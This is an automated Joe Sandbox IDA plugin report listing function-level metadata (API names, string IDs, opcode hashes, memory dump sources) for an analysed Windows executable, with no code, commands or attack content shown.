                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: fmodffreemallocmemcpystrncpy
                                                                                                                                                                          • String ID: #SCROLLY
                                                                                                                                                                          • API String ID: 511038203-1064663049
                                                                                                                                                                          • Opcode ID: b45b85b28c51426c8233574e15a5e913fa359d2cffe3a2bc40f8a65ab2b2130a
                                                                                                                                                                          • Instruction ID: 878fee6d1227c2337157adfde1fc69b82a5011762ec193d4e5e72a4c0e1b7806
                                                                                                                                                                          • Opcode Fuzzy Hash: b45b85b28c51426c8233574e15a5e913fa359d2cffe3a2bc40f8a65ab2b2130a
                                                                                                                                                                          • Instruction Fuzzy Hash: F2730733E28396C6E711EA3684892B977A0EF5A384F198735DE1DA7691FF29F440C701
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharMultiWide$_invalid_parameter_noinfo_noreturnmemchrmemset$__stdio_common_vsnprintf_smemcpy
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3704722475-0
                                                                                                                                                                          • Opcode ID: 2e1da8238d915b69f7870db45f0b432fbaffb02c73d06a9ec1cadcb7f203864f
                                                                                                                                                                          • Instruction ID: fe979d2188538b49fc2e067c275282f7760df71cfeef9e27a2de89f340d43659
                                                                                                                                                                          • Opcode Fuzzy Hash: 2e1da8238d915b69f7870db45f0b432fbaffb02c73d06a9ec1cadcb7f203864f
                                                                                                                                                                          • Instruction Fuzzy Hash: 9B22AD33A28BC5C5E711EB75E4842B96760FB99798F049332EE8D67A59DF38E184C700
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: sqrtf
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 321154650-0
                                                                                                                                                                          • Opcode ID: e86c0954d7ccd5c103a6c7657bec9fc1f9f8f7ea36180be09ebcd625d14c0eae
                                                                                                                                                                          • Instruction ID: d4966816e9a7de9793396ecb2765533a1e83d651cd3b00f662e02a18bdca2481
                                                                                                                                                                          • Opcode Fuzzy Hash: e86c0954d7ccd5c103a6c7657bec9fc1f9f8f7ea36180be09ebcd625d14c0eae
                                                                                                                                                                          • Instruction Fuzzy Hash: A4B17323E38BCC81E223A63754865F9E250AFBF385F2DDB23F984756B29F1561D19600
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ClipboardGlobal$AllocCloseDataEmptyFreeLockOpenUnlock
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 453615576-0
                                                                                                                                                                          • Opcode ID: a02a1fea358fca85474d043749fc72989d88a7aaf32ba67f2ff618c2e72d0539
                                                                                                                                                                          • Instruction ID: 792c9abc3be2d0233bbb95ca90aad9dea21d2ff53afa7d39e1cf6dfea8fe47e8
                                                                                                                                                                          • Opcode Fuzzy Hash: a02a1fea358fca85474d043749fc72989d88a7aaf32ba67f2ff618c2e72d0539
                                                                                                                                                                          • Instruction Fuzzy Hash: 7831A323A28642C6EB20AF14E4982B9E7A1FF45BD4F084535DA8DC77D5DE7DE481CB00
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: sqrtf
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 321154650-0
                                                                                                                                                                          • Opcode ID: d3afc9c69156ae83ae7c5b4b3fb48d42f1e67938515508aa1f2cd4b06cfe98b8
                                                                                                                                                                          • Instruction ID: 06d3e3a8a8ed969cd46f948a41f70e1a8b8ef1756c74cad1ebb5ed77f0da0547
                                                                                                                                                                          • Opcode Fuzzy Hash: d3afc9c69156ae83ae7c5b4b3fb48d42f1e67938515508aa1f2cd4b06cfe98b8
                                                                                                                                                                          • Instruction Fuzzy Hash: 2F924A33924B889AD712CF3794850A9B760FF6E784719DB16EA0867761EF34F1A4DB00
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Concurrency::cancel_current_taskmemset$ControlDevice_invalid_parameter_noinfo_noreturnmalloc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4066468686-0
                                                                                                                                                                          • Opcode ID: f72ef20bdd7f1135492441298a19737a48d0c8b360f5536cde984f76c2ef3b66
                                                                                                                                                                          • Instruction ID: b3fd72b5af5a6c68c48cc6a987ef4ac4d7a2cbb4b15a9b2e3a350feb8177c316
                                                                                                                                                                          • Opcode Fuzzy Hash: f72ef20bdd7f1135492441298a19737a48d0c8b360f5536cde984f76c2ef3b66
                                                                                                                                                                          • Instruction Fuzzy Hash: 50718023A19B85C6EA10EB15E4883BAA7A4FB84BB4F144735EAAD43BD5DF7CD441C700
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: sqrtf
                                                                                                                                                                          • String ID: (
                                                                                                                                                                          • API String ID: 321154650-3887548279
                                                                                                                                                                          • Opcode ID: 75f21d2cba43b537a8f849b5b6e11c892af6542dff6bdc6a939638d87d214b05
                                                                                                                                                                          • Instruction ID: 991054a7d476aa75f83b1daafa0cfd2600d2b70fe9eba75a4918c322e621fa73
                                                                                                                                                                          • Opcode Fuzzy Hash: 75f21d2cba43b537a8f849b5b6e11c892af6542dff6bdc6a939638d87d214b05
                                                                                                                                                                          • Instruction Fuzzy Hash: 92127F33924BC88AD312DF3694821ADB361FF6E788B19D712EA1973665DF34B1A1D700
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: freemallocmemchrmemcpy
                                                                                                                                                                          • String ID: %*s%.*s$ %.*s$#CLOSE$#COLLAPSE
                                                                                                                                                                          • API String ID: 3682640872-4275869412
                                                                                                                                                                          • Opcode ID: 664edfe61803f3a136d3773e68ab2719d6c33066771c045ee550462d2ed2a198
                                                                                                                                                                          • Instruction ID: edb5b8fd850bb3dcdb0cdd0f5236df354a0d6f39cf80344dc5b7f99005bff989
                                                                                                                                                                          • Opcode Fuzzy Hash: 664edfe61803f3a136d3773e68ab2719d6c33066771c045ee550462d2ed2a198
                                                                                                                                                                          • Instruction Fuzzy Hash: 8992A433A14A85DBD715DB3A85842F9B7A0FF59788F089735DB18A76A1DF34B0A4CB00
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memset$malloc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1671641884-0
                                                                                                                                                                          • Opcode ID: fb03c8208558c2f210bc6138100784a45dd3842f0495603024a9522a24260a3d
                                                                                                                                                                          • Instruction ID: d2183ca049c3c43022d898f5e969aa48da2300cd6d7c12d24344dbc1a8aa0e8d
                                                                                                                                                                          • Opcode Fuzzy Hash: fb03c8208558c2f210bc6138100784a45dd3842f0495603024a9522a24260a3d
                                                                                                                                                                          • Instruction Fuzzy Hash: A1D1B433A19BC4C6E7559F26D0892B9B3A4FF58784F189631DB48A3764EF38E591CB00
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: powf
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3445610689-0
                                                                                                                                                                          • Opcode ID: 0720ce1dddcbb673bee487329e21111013dcd7ce74a6c74aaf241786aae20513
                                                                                                                                                                          • Instruction ID: e7923705911f77c9aabf528a524f9e3ee010805b96b9642a2753dd706c445799
                                                                                                                                                                          • Opcode Fuzzy Hash: 0720ce1dddcbb673bee487329e21111013dcd7ce74a6c74aaf241786aae20513
                                                                                                                                                                          • Instruction Fuzzy Hash: E3122B33D29B8DC5E613E63750862B96251AF6E7C0F18CB32ED4DB66A1FF29F5818500
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memchr
                                                                                                                                                                          • String ID: ...
                                                                                                                                                                          • API String ID: 3297308162-440645147
                                                                                                                                                                          • Opcode ID: b7821099e3bd34f42a9e73d33b9418ce4c4ec888a19b140f88b71d9a113969a2
                                                                                                                                                                          • Instruction ID: 1ce6be191c162d855253add031b2517a35021ca26f2958a14a92fc2d10b5c228
                                                                                                                                                                          • Opcode Fuzzy Hash: b7821099e3bd34f42a9e73d33b9418ce4c4ec888a19b140f88b71d9a113969a2
                                                                                                                                                                          • Instruction Fuzzy Hash: 58F1D933918BCDC1E2529B3690453F9B350EF6E7C4F189732EA48B65A2EF79E5818701
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: powf
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3445610689-0
                                                                                                                                                                          • Opcode ID: 94541ddadf6b70f4736226bf363577a1fcb5a8a61429601250559d8446cfd4d8
                                                                                                                                                                          • Instruction ID: 64a924521258af53465181d0411691e2cbf268f87f1dfbae76d6c04eac9d5b29
                                                                                                                                                                          • Opcode Fuzzy Hash: 94541ddadf6b70f4736226bf363577a1fcb5a8a61429601250559d8446cfd4d8
                                                                                                                                                                          • Instruction Fuzzy Hash: 07E10B33D287CDC5E213A73B50861B5A351AF6E784F1DCB32ED48B66A1EF39B5818601
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: powf
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3445610689-0
                                                                                                                                                                          • Opcode ID: 17c203b1e4c55c3f3ec891fc1d863e3dd1ebd1f211813fa8a40ce9b006b96184
                                                                                                                                                                          • Instruction ID: 3546a2b1887134373c33e677a72d093008a647d95407da436b4deadfe74be32b
                                                                                                                                                                          • Opcode Fuzzy Hash: 17c203b1e4c55c3f3ec891fc1d863e3dd1ebd1f211813fa8a40ce9b006b96184
                                                                                                                                                                          • Instruction Fuzzy Hash: 11E1FC33D2C7CDC5E263AA3750862B963509F6E784F1DD732ED48B6261EF2AB581C601
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2933794660-0
                                                                                                                                                                          • Opcode ID: 60f18c7c5d3d4961b3a9a9f50d80de6ff05bbdb6c75665282ae7b423f7d4f72c
                                                                                                                                                                          • Instruction ID: bb68b42b8cf531c9f994fc513dd619ae1e8a98f5c8f722d4dd431475942f58c7
                                                                                                                                                                          • Opcode Fuzzy Hash: 60f18c7c5d3d4961b3a9a9f50d80de6ff05bbdb6c75665282ae7b423f7d4f72c
                                                                                                                                                                          • Instruction Fuzzy Hash: 22111822B24F05CAEB00AF60E8992B833A4FB19758F440E35DA6D86BA4DF7CD1588340
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FormatInfoLocaleMessage
                                                                                                                                                                          • String ID: !x-sys-default-locale
                                                                                                                                                                          • API String ID: 4235545615-2729719199
                                                                                                                                                                          • Opcode ID: 5766c490712e18cb4f9df816c41169682bcf35e1d620e971acb2807726e2b08e
                                                                                                                                                                          • Instruction ID: 551cab3140dc4c5057bce5338ae2a63961e8e264bd9ff007ae8de044091dc377
                                                                                                                                                                          • Opcode Fuzzy Hash: 5766c490712e18cb4f9df816c41169682bcf35e1d620e971acb2807726e2b08e
                                                                                                                                                                          • Instruction Fuzzy Hash: AB01C473F18781C2E7119B12B48877A6795F7847E4F448035DA8D86A94CF3DD841C700
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: %*s%.*s$ %.*s
                                                                                                                                                                          • API String ID: 0-3400057116
                                                                                                                                                                          • Opcode ID: 44062c0337e9e89fbf0354f03f0c3ba82ed00bcf5dda0f827fcb955a38a98ace
                                                                                                                                                                          • Instruction ID: 114351506b258d1bbbe82920c03c9c631e46b4463e6e78bfae74656aa50c272d
                                                                                                                                                                          • Opcode Fuzzy Hash: 44062c0337e9e89fbf0354f03f0c3ba82ed00bcf5dda0f827fcb955a38a98ace
                                                                                                                                                                          • Instruction Fuzzy Hash: 2D22D433A28685C5E711EB3694882F9B760FF59398F148735DE6C97695EF38E484CB00
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00007FF6741581F0: floorf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF67415834C
                                                                                                                                                                            • Part of subcall function 00007FF6741581F0: floorf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF674158379
                                                                                                                                                                            • Part of subcall function 00007FF6741581F0: ceilf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF6741583A0
                                                                                                                                                                            • Part of subcall function 00007FF6741581F0: ceilf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF6741583C3
                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF67415ACC7
